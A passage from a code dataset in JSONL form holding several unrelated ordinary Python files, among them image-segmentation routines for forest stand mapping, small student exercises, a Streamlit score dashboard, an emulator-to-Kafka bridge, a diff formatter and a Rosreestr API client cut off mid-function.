f'{cell_id}_landsat-leaf-on_{best_year}.tif'\n path_to_file = os.path.join(dirname, fname)\n return path_to_file\n\n\ndef load_data(stand_path, chip_size=None, offsets=None):\n \"\"\"Loads NAIP, LANDSAT, and stand delineation data\"\"\"\n dirname, cell_id, state_name, year, agency = parse_stand_path(stand_path)\n naip_path = get_naip_path(dirname, cell_id, state_name, year)\n landsat_path = get_landsat_path(dirname, cell_id, state_name, year)\n\n with rasterio.open(naip_path) as src:\n profile = src.profile\n height, width = src.shape\n if chip_size is not None:\n if offsets is not None:\n row_off, col_off = offsets\n else:\n row_off = np.random.randint(0, height-chip_size)\n col_off = np.random.randint(0, width-chip_size)\n window = windows.Window(col_off, row_off, chip_size, chip_size)\n else:\n window = None\n\n naip = reshape_as_image(src.read(window=window))\n if window is not None:\n trf = src.window_transform(window)\n bbox = src.window_bounds(window)\n else:\n trf = src.transform\n bbox = src.bounds\n\n with rasterio.open(landsat_path) as src:\n if chip_size is not None:\n window = windows.from_bounds(*bbox,\n transform=src.transform,\n height=chip_size,\n width=chip_size)\n else:\n window = windows.from_bounds(*bbox,\n transform=src.transform,\n height=height,\n width=width)\n landsat = ((\n reshape_as_image(\n np.stack(\n [src.read(band+1, window=window) for band in range(4)]\n ))/3000).clip(0, 1)*255).astype(np.uint8)\n\n stands = gpd.read_file(stand_path)\n stands = gpd.clip(stands, box(*bbox))\n\n return naip, landsat, profile, trf, stands\n\n\n@adapt_rgb(each_channel)\ndef sobel_each(image, *args, **kwargs):\n return filters.sobel(image, *args, **kwargs)\n\n\n@adapt_rgb(hsv_value)\ndef sobel_hsv(image, *args, **kwargs):\n return filters.sobel(image, *args, **kwargs)\n\n\ndef calc_ndvi(img):\n r, nir = img[:, :, 0] + 1e-9, img[:, :, 3] + 1e-9\n ndvi = (nir - r) / (nir + r)\n return ndvi.clip(-1.0, 1.0)\n\n\ndef transform_image(src_img, transform, match_img=None, ndvi=False,\n enhance_contrast=True, downscale=5, denoise=True):\n \"\"\"Applies some transformations to an image useful before segmentation.\"\"\"\n if ndvi:\n img, multichannel = calc_ndvi(src_img), False\n if match_img is not None:\n match_img = calc_ndvi(match_img)\n else:\n img, multichannel = img_as_float(src_img[:, :, 0:3]), True\n if match_img is not None:\n match_img = img_as_float(match_img[:, :, 0:3])\n\n if match_img is not None:\n img = match_histograms(img, match_img, multichannel=multichannel)\n\n if enhance_contrast:\n img = equalize_adapthist(img)\n\n if downscale is not None:\n factors = (downscale, downscale, 1) if multichannel else \\\n (downscale, downscale)\n img = downscale_local_mean(img, factors=factors)\n a, b, c, d, e, f, _, _, _ = transform\n trf = Affine(downscale, b, c, d, -downscale, f)\n\n if denoise:\n img = denoise_tv_chambolle(img, multichannel=multichannel)\n\n return img, trf\n\n\ndef oversegment(image, min_distance, downscale, multichannel=False):\n \"\"\"Oversegments an image using watershed segmentation on image gradient.\"\"\"\n if multichannel:\n grad = sobel_hsv(rgb2hsv(image), mode='reflect').max(axis=-1)\n else:\n grad = filters.sobel(image, mode='reflect')\n\n pixel_dist = max(min_distance//downscale, 1)\n peaks = peak_local_max(-grad, min_distance=pixel_dist,\n indices=False, exclude_border=0)\n markers = (peaks.ravel() * peaks.ravel().cumsum()).reshape(*grad.shape)\n basins = watershed(grad, markers=markers)\n\n return basins\n\n\ndef scrm(image, labels, dms, mmu, mas, downscale):\n \"\"\"Applies Size-Constrained Region Merging.\n\n Parameters\n ----------\n image : arr\n image being segmented\n labels : arr\n initial (oversegmented) regions\n dms : int\n desired mean size of merged regions, in acres\n mas : int\n maximum allowed size of merged regions, in acres\n mmu : int\n minimum mappable unit, in acres\n\n Returns\n -------\n regions : arr\n array of same shape as image, with each distinct region indicated by\n increasing integer values\n \"\"\"\n dms_pixels = 4047 * dms / (downscale*downscale)\n mas_pixels = 4047 * mas / (downscale*downscale)\n mmu_pixels = 4047 * mmu / (downscale*downscale)\n\n rag = graph.rag_mean_color(image, labels)\n regions = merge_size_constrained(labels, rag,\n dms_pixels, mas_pixels, mmu_pixels,\n rag_copy=False, in_place_merge=True,\n merge_func=merge_scrm,\n weight_func=weight_scrm,\n ).astype(np.int16)\n\n return regions\n\n\ndef vectorize(regions, transform, crs, simp_dist=5, smooth=True):\n \"\"\"Vectorizes boundaries of regions in a labeled image.\"\"\"\n # vectorize regions to GeoJSON\n shapes = features.shapes(regions, transform=transform)\n # buffer each polygon geometry by 0 to resolve topological errors\n shapes = [(x[0].buffer(0), x[1]) for x in as_shapely(shapes)]\n # simplify boundaries using Douglas-Peucker algorithm\n if simp_dist is not None:\n shapes = simplify_dp(shapes, distance=simp_dist)\n # smooth boundaries using Chaikin corner cutting algorithm\n if smooth:\n shapes = smooth_chaikin(shapes, keep_border=True)\n # convert to a GeoDataFrame\n gdf = gpd.GeoDataFrame(shapes, columns=['geometry', 'stand_id'], crs=crs)\n\n return gdf\n\n\ndef run_segmentation(path_to_stands, chip_size=None, downscale=5, ndvi=False,\n min_marker_distance=10, dms=10, mmu=1, mas=30,\n simp_dist=10):\n data = load_data(path_to_stands, chip_size=chip_size)\n naip, landsat, profile, full_trf, obs_stands = data\n\n img, down_trf, = transform_image(naip, full_trf, match_img=landsat,\n ndvi=ndvi, downscale=downscale)\n\n basins = oversegment(img, min_distance=min_marker_distance,\n downscale=downscale,\n multichannel=~ndvi)\n\n regions = scrm(img, basins, dms=dms, mmu=mmu, mas=mas, downscale=downscale)\n\n pred_stands = vectorize(regions, down_trf,\n crs=profile['crs'],\n simp_dist=simp_dist)\n\n return obs_stands, pred_stands, naip, full_trf\n\n\ndef merge_size_constrained(labels, rag, dms, mas, mmu,\n rag_copy, in_place_merge,\n merge_func, weight_func):\n \"\"\"Perform Size-Constrained Region Merging on a RAG.\n\n Parameters\n ----------\n labels : ndarray\n The array of labels.\n rag : RAG\n The Region Adjacency Graph.\n dms : int\n Desired Mean Size of regions, in pixels.\n mas : int\n Maximum Allowed Size of regions, in pixels. Note: Not a hard cap.\n mmu : int\n Minimum Mappable Unit, minimum size of regions, in pixels.\n rag_copy : bool\n If set, the RAG copied before modifying.\n in_place_merge : bool\n If set, the nodes are merged in place. Otherwise, a new node is\n created for each merge..\n merge_func : callable\n This function is called before merging two nodes. For the RAG `graph`\n while merging `src` and `dst`, it is called as follows\n ``merge_func(graph, src, dst)``.\n weight_func : callable\n The function to compute the new weights of the nodes adjacent to the\n merged node. This is directly supplied as the argument `weight_func`\n to `merge_nodes`.\n Returns\n -------\n out : ndarray\n The new labeled array.\n \"\"\"\n if rag_copy:\n rag = rag.copy()\n\n edge_heap = []\n\n # a couple attributes we'll track to enforce a partial stopping criterion\n rag.graph.update({\n 'num_ge_mmu': 0, # number of regions >= mmu size\n 'area_lt_mmu': 0, # total area in regions smaller than mmu size\n })\n\n total_area = 0 # total area in regions/image\n\n for n in rag:\n area = rag.nodes[n]['pixel count']\n total_area += area\n if area < mmu:\n rag.graph['area_lt_mmu'] += area\n else:\n rag.graph['num_ge_mmu'] += 1\n\n exp_final_num = total_area // dms # expected number of regions\n\n for n1, n2, data in rag.edges(data=True):\n # Push a valid edge in the heap\n wt = data['weight']\n heap_item = [wt, n1, n2, True]\n heapq.heappush(edge_heap, heap_item)\n\n # Reference to the heap item in the graph\n data['heap item'] = heap_item\n\n partial_stop = False\n while len(edge_heap) > 0:\n _, n1, n2, valid = heapq.heappop(edge_heap)\n\n num_ge_mmu = rag.graph['num_ge_mmu']\n area_lt_mmu = rag.graph['area_lt_mmu']\n if ((num_ge_mmu + (area_lt_mmu/dms)) < exp_final_num) and \\\n not partial_stop:\n partial_stop = True\n\n # if the best fitting pair consists of two regions both exceeding MAS,\n # then it is not allowed to merge\n\n # The merging continues this way until the sum of (a) the number of\n # regions currently larger than the minimum allowed size MMU, plus (b)\n # the expected number of final regions that may result from the area\n # currently occupied by regions smaller than MMU, is less than the\n # expected number of final regions (i.e., the image area divided by\n # DMS).\n\n # Thereafter, the candidate list is restricted only to those pairs\n # where at least one of both regions is smaller than MMU.\n\n if valid:\n n1_area = rag.nodes[n1]['pixel count']\n n2_area = rag.nodes[n2]['pixel count']\n if n1_area > mas and n2_area > mas:\n valid = False\n if n1_area > mas and n2_area > mmu:\n valid = False\n if n1_area > mmu and n2_area > mas:\n valid = False\n if partial_stop:\n if n1_area >= mmu and n2_area >= mmu:\n valid = False\n\n # Ensure popped edge is valid, if not, the edge is discarded\n if valid:\n # Invalidate all neigbors of `src` before its deleted\n for nbr in rag.neighbors(n1):\n _invalidate_edge(rag, n1, nbr)\n\n for nbr in rag.neighbors(n2):\n _invalidate_edge(rag, n2, nbr)\n\n if not in_place_merge:\n next_id = rag.next_id()\n _rename_node(rag, n2, next_id)\n src, dst = n1, next_id\n else:\n src, dst = n1, n2\n\n merge_func(rag, src, dst, mmu)\n new_id = rag.merge_nodes(src, dst, weight_func)\n _revalidate_node_edges(rag, new_id, edge_heap)\n\n label_map = np.arange(labels.max() + 1)\n for ix, (n, d) in enumerate(rag.nodes(data=True)):\n for label in d['labels']:\n label_map[label] = ix\n\n return label_map[labels]\n\n\ndef weight_scrm(graph, src, dst, n):\n \"\"\"Callback to handle merging nodes by recomputing mean color.\n\n The method expects that the mean color of `dst` is already computed.\n\n Parameters\n ----------\n graph : RAG\n The graph under consideration.\n src, dst : int\n The vertices in `graph` to be merged.\n n : int\n A neighbor of `src` or `dst` or both.\n\n Returns\n -------\n data : dict\n A dictionary with the `\"weight\"` attribute set as the absolute\n difference of the mean color between node `dst` and `n`.\n \"\"\"\n\n diff = graph.nodes[dst]['mean color'] - graph.nodes[n]['mean color']\n diff = np.linalg.norm(diff)\n\n return {'weight': diff}\n\n\ndef merge_scrm(graph, src, dst, mmu):\n \"\"\"Callback called before merging two nodes of a mean color distance graph.\n\n This method computes the mean color of `dst`.\n\n Parameters\n ----------\n graph : RAG\n The graph under consideration.\n src, dst : int\n The vertices in `graph` to be merged.\n \"\"\"\n src_area = graph.nodes[src]['pixel count']\n dst_area = graph.nodes[dst]['pixel count']\n\n graph.nodes[dst]['total color'] += graph.nodes[src]['total color']\n graph.nodes[dst]['pixel count'] += graph.nodes[src]['pixel count']\n graph.nodes[dst]['mean color'] = graph.nodes[dst]['total color'] /\\\n graph.nodes[dst]['pixel count']\n\n new_area = graph.nodes[dst]['pixel count']\n\n d_num_ge_mmu = (new_area >= mmu) - (src_area >= mmu) - (dst_area >= mmu)\n\n d_area_lt_mmu = (new_area < mmu)*new_area - \\\n (src_area < mmu)*src_area - \\\n (dst_area < mmu)*dst_area\n\n graph.graph['num_ge_mmu'] += d_num_ge_mmu\n graph.graph['area_lt_mmu'] += d_area_lt_mmu\n","repo_name":"d-diaz/stand_mapping","sub_path":"stand_mapping/models/scrm.py","file_name":"scrm.py","file_ext":"py","file_size_in_byte":15972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"924046977","text":"def main():\n n = int(input('Número: '))\n divisores = 0\n aux = n - 1\n while aux > 0:\n if n % aux == 0:\n divisores += aux\n aux -= 1\n if divisores == n:\n print('Perfeito')\n else:\n print('Não é perfeito')\n\n\nif __name__ == '__main__':\n main()","repo_name":"rogeriosilva-ifpi/ads-i-algoritmos-2018","sub_path":"AtividadeO/Alunos/Atividade_O_ElcyJames/perfeito.py","file_name":"perfeito.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74086870059","text":"#Victor Villacorta \r\nfrom __future__ import print_function\r\nnoVacio=0\r\nwhile noVacio==0:\r\n lin=raw_input()\r\n if len(lin)>0 and lin.isspace()==False:\r\n noVacio=1\r\n \r\nTEXTO1=lin.split(\" \")\r\nTEXTO2=[] \r\nrastreo=0 \r\nx=0 \r\nfor i in TEXTO1:\r\n try:\r\n TEXTO2.append(int(i))\r\n TEXTO1[x]=int(i)\r\n rastreo+=1\r\n x+=1\r\n except ValueError: \r\n if i.islower():\r\n TEXTO2.append(i)\r\n x+=1\r\n \r\nTEXTO2.sort() \r\nORDEN=[]\r\ns=0\r\nt=rastreo\r\nfor j in TEXTO1:\r\n if isinstance(j,int):\r\n ORDEN.append(str(TEXTO2[s]))\r\n s=s+1\r\n elif isinstance(j,str):\r\n if j.islower():\r\n ORDEN.append(TEXTO2[t])\r\n t=t+1\r\n\r\nfor i in ORDEN:\r\n print(i, end=' ')\r\n\r\nraw_input(\"\\n\\n\\nPRESS ENTER TO EXIT....\")\r\n","repo_name":"kendalvictor/codeando","sub_path":"winner/VillacortaOrden.py","file_name":"VillacortaOrden.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"4337191775","text":"import streamlit as st\nimport sqlite3\nimport pandas as pd\nfrom student_name02 import load_student_names\nfrom PIL import Image\n\ndef union(conn):\n cursor = conn.cursor()\n sql_query = '''\n WITH CombinedScores AS (\n SELECT\n A.studentName, A.studentID, B.courseName, A.assignmentID AS Tutorial, A.answerScore AS Score1, 0 AS Score2, 0 AS Score3\n FROM\n aes_student_answer_score AS A, aes_course AS B\n WHERE\n (A.courseID = B.courseID) AND (A.assignmentID = 1) \n UNION\n SELECT\n A.studentName, A.studentID, B.courseName, A.assignmentID AS Tutorial, 0 AS Score1, A.answerScore AS Score2, 0 AS Score3\n FROM\n aes_student_answer_score AS A, aes_course AS B\n WHERE\n (A.courseID = B.courseID) AND (A.assignmentID = 2) \n UNION\n SELECT\n A.studentName, A.studentID, B.courseName, A.assignmentID AS Tutorial, 0 AS Score1, 0 AS Score2, A.answerScore AS Score3\n FROM\n aes_student_answer_score AS A, aes_course AS B\n WHERE\n (A.courseID = B.courseID) AND (A.assignmentID = 3) \n )\n SELECT\n studentName,\n studentID,\n courseName,\n Tutorial,\n Score1,\n Score2,\n Score3,\n (Score1 + Score2 + Score3) AS TotalScore\n FROM\n CombinedScores;\n '''\n\n cursor.execute(sql_query)\n result = cursor.fetchall()\n column_names = [desc[0] for desc in cursor.description]\n df_course = pd.DataFrame(result, columns=column_names)\n\n cursor.close()\n conn.close()\n\n return df_course\n\ndef filter_dataframe(df):\n \"\"\"\n Adds a UI on top of a dataframe to let viewers filter columns\n\n Args:\n df (pd.DataFrame): Original dataframe\n\n Returns:\n pd.DataFrame: Filtered dataframe\n \"\"\"\n modify = st.checkbox(\"Checklist for Activated Filter\", value=True)\n\n if not modify:\n return df\n\n df = df.copy()\n\n # Try to convert datetimes into a standard format (datetime, no timezone)\n for col in df[['courseName', 'Tutorial']].columns:\n if is_object_dtype(df[col]):\n try:\n df[col] = pd.to_datetime(df[col])\n except Exception:\n pass\n\n if is_datetime64_any_dtype(df[col]):\n df[col] = df[col].dt.tz_localize(None)\n\n modification_container = st.container()\n # print(df[['Courses', 'Assignment']].columns)\n with modification_container:\n \n to_filter_columns = st.multiselect(\"Filter data\", df[['courseName', 'Tutorial']].columns)\n for column in to_filter_columns:\n left, right = st.columns((14,1))\n # Treat columns with < 10 unique values as categorical\n if is_categorical_dtype(df[column]) or df[column].nunique() < 10:\n user_cat_input = left.multiselect(\n f\"Select to {column}\",\n df[column].unique(),\n default=[]\n # list(df[column].unique()),\n )\n df = df[df[column].isin(user_cat_input)]\n elif is_numeric_dtype(df[column]):\n _min = float(df[column].min())\n _max = float(df[column].max())\n step = (_max - _min) / 100\n user_num_input = left.slider(\n f\"Select to {column}\",\n min_value=_min,\n max_value=_max,\n value=(_min, _max),\n step=step,\n )\n df = df[df[column].between(*user_num_input)]\n elif is_datetime64_any_dtype(df[column]):\n user_date_input = left.date_input(\n f\"Select to {column}\",\n value=(\n df[column].min(),\n df[column].max(),\n ),\n )\n if len(user_date_input) == 2:\n user_date_input = tuple(map(pd.to_datetime, user_date_input))\n start_date, end_date = user_date_input\n df = df.loc[df[column].between(start_date, end_date)]\n else:\n user_text_input = left.text_input(\n f\"Substring or regex in {column}\",\n )\n if user_text_input:\n df = df[df[column].astype(str).str.contains(user_text_input)]\n\n return df\n \nst.set_page_config(page_title=\"Page Title\", layout=\"wide\")\nisi_file = \"\"\n\nst.markdown(\"\"\"\n \n\"\"\", unsafe_allow_html=True)\n\nhead1 = st.header('Real Time Online Tutorial Test', divider='rainbow')\nhead2 = st.write('**Open University** | :sunglasses: **:blue[Automatic Essay Scoring]**')\nconn = sqlite3.connect('database_aes03.db')\nstudent_names = load_student_names(conn)\n\nwith st.sidebar:\n image = Image.open('student.jpg')\n st.image(image)\n\ntab1, tab2, tab3, tab4 = st.tabs([\"Score\", \"Question\", \"Course\", \"Tutor/Lecturer\"])\ndf = union(conn)\n\nrow1_col1, row1_col2, row1_col3 = st.columns([3, 0.5, 11.5])\n\nwith row1_col1:\n st.markdown('\\n')\n x = filter_dataframe(df)\nwith row1_col2:\n ()\nwith row1_col3:\n st.markdown(\"\"\"\n \n \"\"\", unsafe_allow_html=True)\n\n st.markdown('

Scoring Data

', unsafe_allow_html=True)\n \n st.dataframe(x, width=3000, height= 413)\n\n#add_identity = st.selectbox(\n #\"Student Identity\", student_names\n #)\n\n#table = union(conn, add_identity)\n#st.table(table)\n \n","repo_name":"williamhilmysusatyo/streamlit-backup","sub_path":"interface_dosen.py","file_name":"interface_dosen.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"2782479202","text":"import os\nimport re\nimport sys\nimport random\n\n\nlength = int(sys.argv[1]) if len(sys.argv) == 2 else 5\nint_min = -10000\nint_max = 10000\n\nmakefile_cmd = 'make'\nchecker_path = 'checker_Mac'\npush_swap_path = 'push_swap'\n\n\n\nos.popen(makefile_cmd).read()\n\nif not os.path.exists(push_swap_path) or not os.path.exists(checker_path):\n print(f'don\\'t find {push_swap_path} or {checker_path}')\n exit()\n\nargs = ' '.join([str(i) for i in random.sample(range(int_min, int_max), k=length)])\n\ncheck = os.popen(f'./{push_swap_path} {args}| ./{checker_path} {args}').read().removesuffix('\\n')\ncommands = int(re.findall('\\d+', os.popen(f'./push_swap {args}| wc -l').read())[0])\n\nprint(f'{check} - len {length} in {commands} commands | {args}')","repo_name":"Jintow/Push-Swap","sub_path":"python_tester.py","file_name":"python_tester.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"10561359507","text":"import sys\nimport nintaco\nimport pandas as pd\nimport numpy as np\nfrom kafka import KafkaProducer\nimport json\n\nprint(\"run with python, not python3\")\n\nframeCount = 0;\n\nnintaco.initRemoteAPI(\"localhost\", 9998)\n'''\nSince this is in python 2.7 due to constraints imposed by nintaco, I want to keep my engagement here to a minimum\n\nThis system gets the pixels from the API and Puts them untouched on a kafka queue to be used in the state synthesis layer\n\nI also imagine that this is the point where commands are input once the integration hits that point\n'''\nproducer = KafkaProducer(bootstrap_servers='localhost:9092')\napi = nintaco.getAPI()\n\n\n\ndef launch():\n api.addFrameListener(renderFinished)\n # api.addStatusListener(statusChanged)\n api.addActivateListener(apiEnabled)\n api.addDeactivateListener(apiDisabled)\n api.addStopListener(dispose)\n api.run()\n\ndef apiEnabled():\n print(\"Connection to emulator enabled\")\n\ndef apiDisabled():\n print(\"Connection to emulator disabled\")\n\ndef dispose():\n print(\"Connection to emulator stopped\")\n\ndef statusChanged(message):\n print(\"frameCount: %s\" % frameCount)\n print(\"Status message: %s\" % message)\n\ndef renderFinished():\n global frameCount\n if frameCount % (64*10) == 0:\n pixels = get_pixels_raw()\n \"\"\"\n First attempt to send messages to topic from actuation layer\n\n Imagine this will fail without some initial setup\n \"\"\"\n result = producer.send('emulator_to_environment', json.dumps(pixels))\n print('Sent message to emulator_to_environment with result: ', result)\n frameCount = 0\n frameCount += 1\n\ndef get_pixels_raw():\n pixels = [0] * (256*240)\n api.getPixels(pixels)\n return pixels\n\n\nif __name__ == \"__main__\":\n launch()\n","repo_name":"d00medman/wintermute_prototype_pre_organization","sub_path":"prototype/emulation_layer/actuation.py","file_name":"actuation.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"30225684352","text":"import json\n\n\ndef format_string(new_value, path, node, action: str, result: list, old_value=None):\n path += node\n f_string = \"\"\n strange_means = [\"false\", \"true\", \"null\", \"[complex value]\"]\n if isinstance(new_value, dict):\n new_value = \"[complex value]\"\n if isinstance(old_value, dict):\n old_value = \"[complex value]\"\n else:\n pass\n if new_value not in strange_means and type(new_value) != int:\n new_value = f'\\'{new_value}\\''\n if old_value not in strange_means and type(old_value) != int:\n old_value = f'\\'{old_value}\\''\n if action == \"delete\":\n f_string = f'Property \\'{path}\\' was removed\\n'\n elif action == \"add\":\n f_string = f'Property \\'{path}\\' was added with value: {new_value}\\n'\n elif action == \"update\":\n f_string = f'Property \\'{path}\\' was updated. From {old_value} to {new_value}\\n'\n result.extend(f_string)\n return result\n\n\ndef status_node(list_of_node, node, status):\n count, result = 0, \"status\"\n for point in list_of_node:\n if point == node:\n count += 1\n if count == 1 and status == \"+\":\n result = \"add\"\n elif count == 2 and status == \"-\":\n result = \"update\"\n elif count == 1 and status == \" \":\n result = \"not change\"\n elif count == 1 and status == \"-\":\n result = \"delete\"\n return result\n\n\ndef separate_status_of_name(list_of_node):\n formate_node = []\n for point in list_of_node:\n point = point[0:len(point) - 1]\n formate_node.append(point)\n return formate_node\n\n\ndef status_key(diction: dict, result, path=\"\", depth=1):\n keys = list(diction.keys())\n formate_keys_name = separate_status_of_name(keys)\n for node in keys:\n status = str(node)[-1]\n node_for_check = node[0:len(str(node)) - 1]\n what_hapend = status_node(formate_keys_name, node_for_check, status)\n if isinstance(diction[node], dict) and status == \" \":\n path += str(node_for_check) + \".\"\n length_node = len(str(node_for_check))\n depth += 1\n status_key(diction[node], result, path, depth)\n path = path[0:len(path) - (length_node + 1)]\n depth -= 1\n if depth == 1:\n path = \"\"\n elif what_hapend == \"add\":\n format_string(diction[node], path, node_for_check, what_hapend, result)\n elif what_hapend == \"update\":\n old_value = diction[node_for_check + \"-\"]\n new_value = diction[node_for_check + \"+\"]\n format_string(new_value, path, node_for_check, what_hapend, result, old_value)\n elif what_hapend == \"delete\":\n format_string(diction[node], path, node_for_check, what_hapend, result)\n return result\n\n\ndef convert_to_json(diction: dict):\n keys = list(diction.keys())\n for node in keys:\n if isinstance(diction[node], dict):\n convert_to_json(diction[node])\n else:\n value = diction[node]\n if value is False:\n value = \"false\"\n elif value is None:\n value = \"null\"\n elif value is True:\n value = \"true\"\n diction[node] = value\n return diction\n\n\ndef convert_str(string, depth):\n convert = \" \" * depth\n length = len(convert)\n convert = convert[2:length] + string[-1] + \" \" + string[0:len(string) - 1]\n return convert\n\n\ndef convert_dict_to_list(diction, result_list, depth=1):\n keys = diction.keys()\n for node in keys:\n if isinstance(diction[node], dict):\n ma_str = convert_str(str(node), depth)\n result_list.extend(ma_str)\n result_list.extend(\": {\\n\")\n depth += 1\n convert_dict_to_list(diction[node], result_list, depth)\n depth -= 1\n result_list.extend(\" \" * depth + \"}\\n\")\n else:\n ma_str = convert_str(str(node), depth)\n result_list.extend(ma_str)\n result_list.extend(\": \")\n result_list.extend(list(str(diction[node])))\n result_list.extend(\"\\n\")\n return result_list, depth\n\n\ndef stylish(diction, mode):\n result_list = []\n finally_str = \"\"\n convert_to_json(diction)\n if mode == \"json\":\n convert_dict_to_list(diction, result_list)\n finally_str = \"{\\n\"\n for sym in result_list:\n finally_str += sym\n finally_str += \"}\"\n finally_str = json.dumps(finally_str)\n if mode == \"plain\":\n result_list = status_key(diction, result_list)\n result_list = result_list[0:len(result_list) - 1]\n for i in result_list:\n finally_str += i\n if mode == 'stylish':\n convert_dict_to_list(diction, result_list)\n finally_str = \"{\\n\"\n for sym in result_list:\n finally_str += sym\n finally_str += \"}\"\n return finally_str\n","repo_name":"shiffter/python-project-lvl2_finished","sub_path":"gendiff/formaters.py","file_name":"formaters.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7557535859","text":"import operator, sys\n\ndef sort_by_name_same_lastnames(names):\n names = sorted(names, key = operator.itemgetter(1))\n start = 0\n count = 1\n last_name = names[0][1]\n for i in range(1, len(names)):\n if last_name == names[i][1]:\n count += 1\n else:\n if count > 1:\n names[start:i] = sorted(names[start:i], key = operator.itemgetter(0))\n start = i\n count = 1\n last_name = names[i][1]\n if count > 1:\n names[start:] = sorted(names[start:], key = operator.itemgetter(0))\n return names\n\nname = sys.stdin.readline()\nnames = []\nname_history = []\nduplicates = []\nwhile name:\n name = name[:len(name) - 1].split(' ')\n names.append((name[0], name[1]))\n if name[0] not in name_history:\n name_history.append(name[0])\n else:\n if name[0] not in duplicates:\n duplicates.append(name[0])\n name = sys.stdin.readline()\n\nnames = sort_by_name_same_lastnames(names)\nfor name in names:\n if name[0] in duplicates:\n print(name[0], name[1])\n else:\n print(name[0])\n","repo_name":"gkamtzir/Kattis-Problems","sub_path":"roll_call.py","file_name":"roll_call.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"26478393300","text":"from typing import TYPE_CHECKING, Optional\n\nfrom pysqlcipher3 import dbapi2 as sqlcipher\n\nfrom rotkehlchen.db.dbhandler import DBHandler\nfrom rotkehlchen.errors.misc import InputError\nfrom rotkehlchen.types import AVAILABLE_MODULES_MAP, ChecksumAddress, ModuleName\n\nif TYPE_CHECKING:\n from rotkehlchen.db.drivers.gevent import DBCursor\n\n\nclass QueriedAddresses:\n\n def __init__(self, database: DBHandler):\n self.db = database\n\n def add_queried_address_for_module(self, module: ModuleName, address: ChecksumAddress) -> None:\n \"\"\"May raise:\n - InputError: If the address is already in the queried addresses for\n the module\n \"\"\"\n with self.db.user_write() as cursor:\n try:\n cursor.execute(\n 'INSERT INTO multisettings(name, value) VALUES(?, ?)',\n (f'queried_address_{module}', address),\n )\n except sqlcipher.DatabaseError as e: # pylint: disable=no-member\n raise InputError(\n f'Address {address} is already in the queried addresses for {module}',\n ) from e\n\n def remove_queried_address_for_module(\n self,\n module: ModuleName,\n address: ChecksumAddress,\n ) -> None:\n \"\"\"May raise:\n - InputError: If the address is not in the queried addresses for\n the module\n \"\"\"\n with self.db.user_write() as cursor:\n cursor.execute(\n 'DELETE FROM multisettings WHERE name=? AND value=?;',\n (f'queried_address_{module}', address),\n )\n if cursor.rowcount != 1:\n raise InputError(f'Address {address} is not in the queried addresses for {module}')\n\n def get_queried_addresses_for_module(\n self,\n cursor: 'DBCursor',\n module: ModuleName,\n ) -> Optional[tuple[ChecksumAddress, ...]]:\n \"\"\"Get a List of addresses to query for module or None if none is set\"\"\"\n cursor = self.db.conn.cursor()\n query = cursor.execute(\n 'SELECT value FROM multisettings WHERE name=?;',\n (f'queried_address_{module}',),\n )\n result = tuple(entry[0] for entry in query)\n return None if len(result) == 0 else result\n\n def get_queried_addresses_per_module(self) -> dict[ModuleName, tuple[ChecksumAddress, ...]]:\n \"\"\"Get a mapping of modules to addresses to query for that module\"\"\"\n mapping: dict[ModuleName, tuple[ChecksumAddress, ...]] = {}\n with self.db.conn.read_ctx() as cursor:\n for module in AVAILABLE_MODULES_MAP:\n result = self.get_queried_addresses_for_module(cursor, module) # type: ignore\n if result is not None:\n mapping[module] = result # type: ignore\n\n return mapping\n","repo_name":"rotki/rotki","sub_path":"rotkehlchen/db/queried_addresses.py","file_name":"queried_addresses.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","stars":2391,"dataset":"github-code","pt":"92"} +{"seq_id":"72649197740","text":"import asyncio\n\nimport aiohttp\nfrom loguru import logger\nfrom yarl import URL\nfrom django.conf import settings\nSSL_VERIFY = settings.SSL_VERIFY\n\ntimeout = aiohttp.ClientTimeout(total=15)\n\n\nclass NotFound(Exception):\n pass\n\n\nclass TemporaryUnavalible(Exception):\n pass\n\n\nclass RosreestrClient:\n @classmethod\n async def find_objects(cls, dadata):\n try:\n return await cls._find_objects(dadata)\n except asyncio.TimeoutError:\n raise TemporaryUnavalible\n\n @classmethod\n async def _find_objects(cls, dadata):\n url = 'https://rosreestr.ru/api/online/address/fir_objects'\n connector = aiohttp.TCPConnector()\n async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:\n params = await cls._get_settl(session, dadata)\n params['street'] = str(dadata['data']['street'])\n params['house'] = dadata['data']['house']\n if dadata['data']['flat']:\n params['apartment'] = dadata['data']['flat']\n if dadata['data']['block']:\n params['building'] = dadata['data']['block']\n url += '?'\n for key, value in params.items():\n url += f'&{key}={value}'\n\n async with session.get(URL(url, encoded=False), ssl=SSL_VERIFY) as response:\n if response.status == 204:\n raise NotFound\n js = await response.json()\n logger.debug(js)\n return js\n\n @classmethod\n async def _get_reg(cls, session: aiohttp.ClientSession, dadata_query):\n query = dadata_query['data']['city'] or dadata_query['data']['area']\n macro_reg = await cls._get_macro_reg(session, dadata_query)\n async with session.get(f'https://rosreestr.ru/api/online/regions/{macro_reg}', ssl=SSL_VERIFY) as response:\n data = await response.json()\n for item in data:\n if query.lower() in item['name'].lower():\n return {'macroRegionId': macro_reg, 'regionId': item['id']}\n return query\n\n @classmethod\n async def _get_settl(cls, session: aiohttp.ClientSession, dadata_query):\n query = dadata_query['data']['city'] or dadata_query['data']['settlement']\n reg = await cls._get_reg(session, dadata_query)\n async with session.get(f'https://rosreestr.ru/api/online/regions/{reg[\"regionId\"]}', ssl=SSL_VERIFY) as respone:\n data = await respone.json()\n for item in data:\n if query.lower() in item['name'].lower():\n # reg['settlementId'] = 